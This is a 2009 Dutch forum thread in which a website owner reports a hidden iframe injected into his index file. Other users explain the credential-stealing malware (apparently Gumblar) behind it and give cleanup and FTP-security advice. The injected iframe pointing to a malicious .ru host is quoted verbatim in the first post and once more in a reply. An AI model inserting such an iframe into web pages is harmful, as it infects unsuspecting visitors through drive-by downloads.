FOK!forum / Digital Corner / Vreemd virus op mijn website?
FortunaHomemaandag 13 juli 2009 @ 20:27
Hallo,

Mensen op mijn site klagen over een virus en als ik ga kijken in de index file stond er opeens dit in:

<iframe src="http://a5j.ru:8080/ts/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"></iframe>

Iemand enig idee wat de fuck dit is en hoe dat daar komt????
Ezechielkmaandag 13 juli 2009 @ 20:31
Wat dit is? Een virus.
Hoe het er komt? Iemand heeft je index aangepast?
Hoe? Lekke server, brakke code of brakke FTP gegevens.
Bill_Emaandag 13 juli 2009 @ 20:33
quote:
Op maandag 13 juli 2009 20:31 schreef Ezechielk het volgende:
Wat dit is? Een virus.
Hoe het er komt? Iemand heeft je index aangepast?
Hoe? Lekke server, brakke code of brakke FTP gegevens.
lift
-_Tommy_-maandag 13 juli 2009 @ 20:33
een verwijzing naar een andere site/bestand...

hoe dat komt? omdat je je beveiliging te laag hebt staan!
FortunaHomemaandag 13 juli 2009 @ 20:39
Het schijnt idd dat een of ander virus in imloop is wat ftp gegevens steelt en zijn eigen kutlinks in je php bestanden kopieert... echt welke nerd maakt zon kankerprogramme...

opknopen zoiets
AquaMarynmaandag 13 juli 2009 @ 20:42
Er heeft waarschijnlijk ooit een virus of trojan op je computer gestaan (als ie er nog niet steeds op staat), die iframes automatisch wegschrijft naar alle bestanden waar HTML in zit. Als je zo'n html bestand vervolgens op je site zet zonder de source code te checken krijg je dit soort dingen.

Tip: alle html bestanden checken op iframes en die eruit gooien. (Gewoon alle code tussen/inclusief <iframe....></iframe>) Dan ook je computer scannen. Bij mij vind Avast! iig foute iframes.

Je kan dit al doen door via Windows te zoeken naar *.html, *.htm, *.php, *.asp bestanden die het woord 'iframe' bevatten, geloof ik.

Als jij die index er zelf niet neer hebt gezet, komt het van de server van je webhosting af. Zou in dat geval even contact opnemen met ze, want dat is nogal lomp...
CasBmaandag 13 juli 2009 @ 20:42
Lekkere server als je ftp-gegevens gejat worden.
Ripariusmaandag 13 juli 2009 @ 20:46
quote:
Op maandag 13 juli 2009 20:27 schreef FortunaHome het volgende:
Hallo,

Mensen op mijn site klagen over een virus en als ik ga kijken in de index file stond er opeens dit in:

<iframe src="http://a5j.ru:8080/ts/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"></iframe>

Iemand enig idee wat de fuck dit is en hoe dat daar komt????
Kijk ook even of je site al op de zwarte lijst staat van Google. Gaat het eenvoudigst als je een site bezoekt met FireFox, je krijgt dan in plaats van de site in kwestie een rood waarschuwingsscherm te zien.

De laatste tijd zijn er veel besmette websites gesignaleerd. Dat werkt als volgt:

1. Iemand bezoekt een (bonafide) reeds besmette website, die de computer van de bezoeker infecteert.

2. Een stukje malware op de zojuist besmette computer gaat op zoek naar FTP inloggegevens. Worden deze gevonden, dan worden ze doorgegeven aan de maker (c.q. verspreider) van de malware.

3. De maker c.q. verspreider van de malware gebruikt de buitgemaakte inloggegevens om de betreffende websites aan te passen c.q. te infecteren met een stukje obfuscated javascript o.i.d.

4. Nietsvermoedende bezoekers blijven de voorheen als betrouwbaar bekend staande site bezoeken, waardoor ook hún computers worden geïnfecteerd.

5. Ga terug naar stap 1 om te lezen wat er nu weer met deze computers gebeurt ...

Op deze manier ontstaat dus een soort sneeuwbaleffect. Je moet in ieder geval de computer(s) die je hebt gebruikt voor het updaten van je site onderzoeken op malware, tenminste één hiervan is besmet. Je moet natuurlijk ook meteen het FTP wachtwoord dat je gebruikt om je site te updaten wijzigen, want je inloggegevens zijn immers gestolen. En je moet alle pagina's van je site nakijken. Als je al op de zwarte lijst van Google terecht bent gekomen, dan kun je na het opschonen een verzoek indienen om je site opnieuw te laten scannen. Wordt de site dan clean bevonden, dan wordt deze weer van de zwarte lijst gehaald.
Dondersmaandag 13 juli 2009 @ 20:53
Sterkte TS!
FortunaHomemaandag 13 juli 2009 @ 20:55
Wachtwoord is gewijzigd en ik heb ook de clown gevonden met dit virus op zijn pc.

Het lijkt er vooralsnog op dat alleen bestanden die met index beginnen zijn aangetast
ukkermaandag 13 juli 2009 @ 21:13
Heb een aantal weken geleden hetzelfde gehad.. 6 (!) van mijn sites waren geïnfecteerd. Scannen met ad-aware en nod32, alle ftp wachtwoorden wijzigen (van een aantal had ik geen plesk of root toegang, moest ik weer heen en weer bellen met de hoster) en je bestanden opnieuw uploaden does the trick.

Bij sommige sites heb ik 2 weken lang elke dag het html bestand moeten downloaden en de iframe moeten verwijderen, op een vast tijdstip (half 8 smorgens) werd het automatisch weer geplaatst door een of ander kutscript die de hackers gebruiken.. Verder herken je de hidden iframe's meestal vet snel omdat het heel je layout verneukt. Hadden ze beter anders kunnen doen met een hidden div maargoed, dood aan die kuthackers.
Adidahmaandag 13 juli 2009 @ 21:16
Om deze reden zou ik dus nooit een web server ook als werkstation gebruiken .
Ame_thystmaandag 13 juli 2009 @ 21:16
Ook last van gehad. Bewijst maar weer hoe kut windows is.
Ame_thystmaandag 13 juli 2009 @ 21:16
quote:
Op maandag 13 juli 2009 21:16 schreef Adidah het volgende:
Om deze reden zou ik dus nooit een web server ook als werkstation gebruiken .
Wat heeft dat er nu weer mee te maken?
Adidahmaandag 13 juli 2009 @ 21:19
quote:
Op maandag 13 juli 2009 21:16 schreef Ame_thyst het volgende:

[..]

Wat heeft dat er nu weer mee te maken?
Nou, wat denk je zelf?
fotostartermaandag 13 juli 2009 @ 21:40
quote:
Blijkbaar heb jij -of iemand gebruik makend maakt van jouw IP adres- zich niet aan de voorschriften van onze site gehouden.

Ben je het niet eens met deze beslissing, stuur dan een email naar webmaster@fortunahome.com.
Ik kom nooit op die site
Ame_thystmaandag 13 juli 2009 @ 22:22
quote:
Op maandag 13 juli 2009 21:19 schreef Adidah het volgende:

[..]

Nou, wat denk je zelf?
Dit virus jat FTP gegevens. Heeft niet veel te maken met workstation of servers.
Iedere pc met een FTP client welke verbinding maakt met een webserver is de lul.
ukkermaandag 13 juli 2009 @ 22:24
quote:
Op maandag 13 juli 2009 21:19 schreef Adidah het volgende:

[..]

Nou, wat denk je zelf?
Het gaat om de FTP-gegevens, denk je dat ik op een webserver ga lopen internetten
AquaMarynmaandag 13 juli 2009 @ 22:25
quote:
Op maandag 13 juli 2009 22:22 schreef Ame_thyst het volgende:

[..]

Dit virus jat FTP gegevens. Heeft niet veel te maken met workstation of servers.
Iedere pc met een FTP client welke verbinding maakt met een webserver is de lul.
Denk dat ik de opgeslagen wachtwoorden maar 'es uit m'n FTP-client ga verwijderen...
Adidahmaandag 13 juli 2009 @ 22:34
quote:
Op maandag 13 juli 2009 22:22 schreef Ame_thyst het volgende:

[..]

Dit virus jat FTP gegevens. Heeft niet veel te maken met workstation of servers.
Iedere pc met een FTP client welke verbinding maakt met een webserver is de lul.
quote:
Op maandag 13 juli 2009 22:24 schreef ukker het volgende:

[..]

Het gaat om de FTP-gegevens, denk je dat ik op een webserver ga lopen internetten
quote:
Op maandag 13 juli 2009 22:25 schreef AquaMaryn het volgende:

[..]

Denk dat ik de opgeslagen wachtwoorden maar 'es uit m'n FTP-client ga verwijderen...
Daarom moet je dus ook geen wachtwoorden laten onthouden . Als je wachtwoorden opslaat, maakt het qua beveiliging geen fuck meer uit of het om een werkstation of server gaat.
AquaMarynmaandag 13 juli 2009 @ 22:36
quote:
Op maandag 13 juli 2009 22:34 schreef Adidah het volgende:

[..]


[..]


[..]

Daarom moet je dus ook geen wachtwoorden laten onthouden .
I know, maar het is zo makkelijk!! Wachtwoorden van websites sla ik sowieso nooit op, maar aan FTP had ik eigenlijk nooit gedacht, dat zit ten slotte in een apart client... maar daar heb je dus ook niets aan.
doppendooschdinsdag 14 juli 2009 @ 00:09
quote:
Op maandag 13 juli 2009 @ 22:34 schreef Adidah het volgende:

[..]


[..]


[..]

Daarom moet je dus ook geen wachtwoorden laten onthouden . Als je wachtwoorden opslaat, maakt het qua beveiliging geen fuck meer uit of het om een werkstation of server gaat.
Daarom zou een besturingssysteem gewoon een beveiligde keyring moeten hebben zodat niet ieder virus zomaar bij de opgeslagen wachtwoorden kan.
AquaMaryndinsdag 14 juli 2009 @ 01:17
quote:
Op dinsdag 14 juli 2009 00:09 schreef doppendoosch het volgende:

[..]

Daarom zou een besturingssysteem gewoon een beveiligde keyring moeten hebben zodat niet ieder virus zomaar bij de opgeslagen wachtwoorden kan.
Totdat slimme hackertjes die keyring weer weten te kraken...
FortunaHomedinsdag 14 juli 2009 @ 10:21
Thanks voor de tips allemaal. Ik heb de mensen die de site updaten geadviseerd het veranderde ftp wachtwoord niet meer op te slaan maar steeds zelf in te tikken. Dan ondervang je tenminste iets.

Ondertussen heeft onze hosting provider een backup teruggegooid van 3 dagen geleden, echter nu werken weer een hoop zaken niet.

Echt triest dat een paar van die blije hacker nerds ons zo ontzettend veel tijd kosten
L0wedinsdag 14 juli 2009 @ 10:35
quote:
Op dinsdag 14 juli 2009 10:21 schreef FortunaHome het volgende:
Thanks voor de tips allemaal. Ik heb de mensen die de site updaten geadviseerd het veranderde ftp wachtwoord niet meer op te slaan maar steeds zelf in te tikken. Dan ondervang je tenminste iets.

Ondertussen heeft onze hosting provider een backup teruggegooid van 3 dagen geleden, echter nu werken weer een hoop zaken niet.

Echt triest dat een paar van die blije hacker nerds ons zo ontzettend veel tijd kosten
Waarschijnlijk is het gewoon een scriptkiddy die zich even lekker aan het uitleven was. Beetje slim omgaan met je inloggegevens ljikt me ook wel het meest vanzelfsprekende imho.
whoopsdinsdag 14 juli 2009 @ 10:46
FTP
FortunaHomedinsdag 14 juli 2009 @ 11:08
quote:
Op dinsdag 14 juli 2009 10:46 schreef whoops het volgende:
FTP
Ja FTP ja... het moet een beetje simpel blijven om te updaten he... Het is een vrije tijds pagina die door vrijwilligers omhoog wordt gehouden.

Maarja, je hebt altijd van die betweters als jij natuurlijk
CasBdinsdag 14 juli 2009 @ 11:11
Er is niks mis met FTP. Hoe wil je anders je pagina's uploaden. Zeker via een webinterface van Plesk of iets wat er op lijkt.
Tuvai.netdinsdag 14 juli 2009 @ 11:27
Dan ben je toch wel erg brak beveiligd als je ZULKE rotzooi op je computer hebt. Misschien eens wat minder rotzooi openen die je via Incredimail binnen krijgt. ;')
wdndinsdag 14 juli 2009 @ 11:35
quote:
Op dinsdag 14 juli 2009 11:11 schreef CasB het volgende:
Er is niks mis met FTP. Hoe wil je anders je pagina's uploaden. Zeker via een webinterface van Plesk of iets wat er op lijkt.
ssh, rcp, scp?
whoopsdinsdag 14 juli 2009 @ 11:48
quote:
Op dinsdag 14 juli 2009 11:11 schreef CasB het volgende:
Er is niks mis met FTP. Hoe wil je anders je pagina's uploaden. Zeker via een webinterface van Plesk of iets wat er op lijkt.
Dude...
quote:
Op dinsdag 14 juli 2009 11:35 schreef wdn het volgende:

[..]

ssh, rcp, scp?
RCP is ook unencrypted, dus onveilig... Iets over SSH (SCP, SFTP, of SVN+SSH) zijn wat mij betreft de way to go...
wdndinsdag 14 juli 2009 @ 11:49
Ok, geen rcp dan

CasB: FTP is zo LEK als een mandje. Dat is wat er mis mee is.
FortunaHomedinsdag 14 juli 2009 @ 11:53
En hoe ga ik mensen die de hele dag op hun werk zitten en 's avonds in hun vrije tijd de pagina wat updaten uitleggen dat ze dit soort tools moeten gaan gebruiken

Gaat niet werken dus we blijven bij ftp met de nodige risico's dan maar...
wdndinsdag 14 juli 2009 @ 11:56
quote:
Op dinsdag 14 juli 2009 11:53 schreef FortunaHome het volgende:
En hoe ga ik mensen die de hele dag op hun werk zitten en 's avonds in hun vrije tijd de pagina wat updaten uitleggen dat ze dit soort tools moeten gaan gebruiken

Gaat niet werken dus we blijven bij ftp met de nodige risico's dan maar...
ssh gaat op zelfde manier als ftp. Is alleen een andere poort
OpenSSH maakt bijvoorbeeld gebruik van sftp (secure ftp) ipv ftp.
doppendooschdinsdag 14 juli 2009 @ 12:57
quote:
Op dinsdag 14 juli 2009 01:17 schreef AquaMaryn het volgende:

[..]

Totdat slimme hackertjes die keyring weer weten te kraken...
Dat gebeurt niet, want als dat zo makkelijk gaat kun je net zo goed gelijk die FTP-server kraken zonder omweg.
mscholdinsdag 14 juli 2009 @ 13:59
quote:
Op dinsdag 14 juli 2009 11:35 schreef wdn het volgende:

[..]

ssh, rcp, scp?
allemaal protocollen die niet gemaakt zijn voor bestandsoverdracht..
ik heb gelukkig gewoon lokaal toegang tot server
whoopsdinsdag 14 juli 2009 @ 14:11
quote:
Op dinsdag 14 juli 2009 13:59 schreef mschol het volgende:

[..]

allemaal protocollen die niet gemaakt zijn voor bestandsoverdracht..
ik heb gelukkig gewoon lokaal toegang tot server
mscheel weet weer eens perfect waar 'ie het over heeft hoor...
quote:
Secure Copy or SCP is a means of securely transferring computer files between a local and a remote host or between two remote hosts, using the Secure Shell (SSH) protocol.
Dude, lees je eens in voordat je dom gaat lopen bazelen, uberdummy...

Bah bah...
Ame_thystdinsdag 14 juli 2009 @ 14:15
Ja maar ik heb toch een firewall
slacker_nldinsdag 14 juli 2009 @ 14:16
Whoops, niet iedereen heeft een eigen server en ik denk dat de meeste hosters alleen maar FTP access aanbieden voor eea. Zodra je een eigen server hebt is sftp wel de way to go.
whoopsdinsdag 14 juli 2009 @ 18:04
quote:
Op dinsdag 14 juli 2009 14:16 schreef slacker_nl het volgende:
Whoops, niet iedereen heeft een eigen server en ik denk dat de meeste hosters alleen maar FTP access aanbieden voor eea. Zodra je een eigen server hebt is sftp wel de way to go.
You are right

Hoogste tijd dus dat hosters standaard een veiliger methode gebruiken. Het is echt niets moeilijker dan FTP, zoals hier gesuggereerd wordt.
MikeyMozondag 9 augustus 2009 @ 22:28
Dit probleem doemt nu bij mij ook op op mijn door Joomla gestuurde site. Echter zit ik thuis hier op een Mac. Ik run voor de zekerheid een virusscanner maar het lijkt me een beetje niet mogelijk dat ik een trojan zou hebben.

De enkele andere plek waarop FTP gegevens van mijn server staan is op de windows PC op mijn werk, maar ik ben al sinds 1,5e week vrij. Het lijkt me niet dat zo'n script 10 dagen gaat wachten met het hacken van een server. Dan zou enkel een collega die op mijn computer heeft gezeten iets verdachts moeten hebben bekeken. Maar ja, dit houdt in dat ook alle sites van ons en onze klanten gevaar lopen, maar tot nu toe heb ik nog niets raars gezien op die sites.
MikeyMozondag 9 augustus 2009 @ 22:31
Overigens had de webhoster het erover dat het meer leek op Brute Force aangezien er zeker 825 keer geprobeerd was in te loggen oid. Dat lijkt me vaag aangezien je met hetw achtwoord wat je hebt gekaapt in 1x goed zit.
Qweazondag 9 augustus 2009 @ 22:32
IP's blokkeren op ftp server

Topic aangemaakt ook al over MM zn probleem
mscholzondag 9 augustus 2009 @ 22:35


[ Bericht 38% gewijzigd door mschol op 10-08-2009 00:29:19 ]
MailGozermaandag 10 augustus 2009 @ 09:02
quote:
Op maandag 13 juli 2009 21:16 schreef Ame_thyst het volgende:
Ook last van gehad. Bewijst maar weer hoe kut windows is.
Webserver draait op Unix.
MikeyMomaandag 10 augustus 2009 @ 09:08
quote:
Op maandag 10 augustus 2009 09:02 schreef MailGozer het volgende:

[..]

Webserver draait op Unix.
ja, maar het virus wat de wachtwoorden zoekt en doorspeelt werkt in een windowsomgeving en kennelijk is het dus gewoon mogelijk dat wanneer een iframe wordt aangeroepen in een pagina met daarop een trojan windows zonder problemen deze gaat runnen.
Qweamaandag 10 augustus 2009 @ 15:54
gumblar virus blijkt nu.

Komt binnen via adobe reader en adobe flash. Dr zitten lekker in. Updaten, van de abode shizzle is een must.

Ik hou van avast die een mooi alarm geeft en schreeuwt dat er een bad iframe is
#ANONIEMdinsdag 11 augustus 2009 @ 15:28
quote:
Op dinsdag 14 juli 2009 10:21 schreef FortunaHome het volgende:
Thanks voor de tips allemaal. Ik heb de mensen die de site updaten geadviseerd het veranderde ftp wachtwoord niet meer op te slaan maar steeds zelf in te tikken. Dan ondervang je tenminste iets.

Ondertussen heeft onze hosting provider een backup teruggegooid van 3 dagen geleden, echter nu werken weer een hoop zaken niet.

Echt triest dat een paar van die blije hacker nerds ons zo ontzettend veel tijd kosten
Tot ze een keylogger oid op hun pc hebben staan
CasBdinsdag 11 augustus 2009 @ 15:34
Volgens mij jat die malware sowieso je logingegevens, ook al sla je ze niet op, omdat ik ergens las dat het je internetverkeer monitort. Dus op het moment dat je gaat ftp'en, komt er toch een keer je wachtwoord voorbij.
Ilogic32maandag 21 september 2009 @ 18:04
Het virus zit in een gekraakte versie van flashfxp!!!
Dus let op wat je download ook bij newsgroepen